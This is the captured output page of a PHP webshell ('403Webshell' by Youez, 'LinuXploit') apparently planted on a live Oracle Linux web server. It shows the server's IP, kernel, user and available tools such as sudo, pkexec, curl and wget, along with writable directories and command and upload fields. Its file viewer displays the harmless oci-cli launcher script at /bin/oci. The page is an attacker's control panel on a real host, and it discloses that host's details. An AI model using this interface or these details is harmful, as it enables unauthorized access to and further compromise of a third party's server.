403Webshell
Server IP : 152.69.216.235  /  Your IP : 80.80.80.28
Web Server : Apache/2.4.37 (Oracle Linux Server)
System : Linux ust-wp4-prod 5.15.0-310.184.5.2.el8uek.x86_64 #2 SMP Wed Jul 9 16:08:33 PDT 2025 x86_64
User : apache ( 48)
PHP Version : 8.4.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/oci
#!/usr/libexec/platform-python
# EASY-INSTALL-ENTRY-SCRIPT: 'oci-cli==3.62.2','console_scripts','oci'
__requires__ = 'oci-cli==3.62.2'
import re
import sys
import os
import importlib.util
sys.path.insert(0,(os.path.join(importlib.util.find_spec("oci").submodule_search_locations[0],'_vendor')))
sys.path.insert(0,(os.path.join(importlib.util.find_spec("oci").submodule_search_locations[0],'packages')))
from pkg_resources import load_entry_point

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('oci-cli==3.62.2', 'console_scripts', 'oci')()
    )

Youez - 2016 - github.com/yon3zu
LinuXploit